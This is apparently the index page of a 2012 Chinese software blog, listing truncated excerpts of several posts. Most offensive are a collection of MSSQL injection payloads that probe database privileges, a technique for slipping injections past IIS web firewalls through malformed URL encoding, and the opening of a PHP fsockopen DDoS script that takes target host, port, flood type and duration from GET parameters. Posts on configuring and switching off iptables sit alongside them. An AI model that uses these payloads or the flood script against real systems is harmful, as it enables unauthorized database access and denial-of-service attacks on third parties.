兔八哥极品软件园    运行: 4509天 | 文章:640 篇 | 评论:554 条 | 碎语:1条

转载啊D常用的注入命令

作者:admin 发布于:2012-8-18 9:46 Saturday 分类:网络转载

我记性不好,所以把常用的注入代码记录下来,有点乱,但对我来说,还算很有用,希望大家也会喜欢!

//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as va...

阅读全文>>

评论(0) 引用(29) 浏览(20174)

突破一流信息监控系统等IIS防火墙实现注入

作者:admin 发布于:2012-8-18 9:33 Saturday 分类:网络转载

先来说URL编码,%加两位的16进制表示一个字符,比如’经过编码之后就是%27,这是人人都知道的URL编码规则,UrlUnescapeInPlace之类的API函数甚至于程序员自己写的URL译码函数都是基于这一思想。

  然而,我们何必如此听话,试想一下要是%后跟的不是16进制数字而是像abc%hh会发生什么事呢。先看UrlUnescapeInPlace,
写 个小程序试一下,abc%hh经过译码还是abc%hh;再看asp.dll是怎么译码的,在asp页面中写入 response.Write(request.QueryString("str")),然后用?str=abc%hh访问它,页面显示 abchh,它直接把%给去掉了。

  ...

阅读全文>>

评论(0) 引用(61) 浏览(19868)

linux下IPTABLES配置详解

作者:admin 发布于:2012-8-18 9:19 Saturday 分类:Linux

如果你的IPTABLES基础知识还不了解,建议先去看看.
开始配置
我们来配置一个filter表的防火墙.
(1)查看本机关于IPTABLES的设置情况
[root@tp ~]# iptables -L -n
Chain INPUT (policy ACCEPT)
target       prot opt source                 destination         ...

阅读全文>>

标签: iptables

评论(0) 引用(61) 浏览(34088)

linux 关闭防火墙iptables

作者:admin 发布于:2012-8-18 8:57 Saturday 分类:Linux

1) 重启后永久性生效:

开启:chkconfig iptables on

关闭:chkconfig iptables off

2) 即时生效,重启后失效:

开启:service iptables start

关闭:service iptables stop

需要说明的是对于Linux下的其它服务都可以用以上命令执行开启和关闭操作。

在开启了防火墙时,做如下设置,开启相关端口,

修改/etc/sysconfig/iptables 文件,添加以下内容:

-A RH-Firewall-1-INPUT -m state ——state NEW -m tcp -p tcp ——dport 80 -j ACCEPT

-A RH-Firewall-1-INPUT -m state ——stat...

阅读全文>>

标签: iptables

评论(0) 引用(51) 浏览(29404)

一段 php fsockopen ddos 代码

作者:admin 发布于:2012-8-17 15:11 Friday 分类:PHP

<?php
header("charset='utf-8'");//设置编码格式为UTF-8
error_reporting(0);//禁用错误报告
set_time_limit(0);//配置该页最久执行时间。  0为永久执行
ignore_user_abort(false); //设置与客户机断开是否会终止脚本的执行。

/*get参数*/
$type = $_GET['type']; //攻击方式 0为TCP 1为UDP
$host = $_GET['host'];  //攻击目标
$port = $_GET['port'];  //攻击端口
$exec_time = $_GET['time'];  //持续时间
$Sendlen =...

阅读全文>>

标签: PHP fsockopen

评论(0) 引用(33) 浏览(44482)


Powered by 兔八哥极品软件 苏ICP备12049267号 sitemap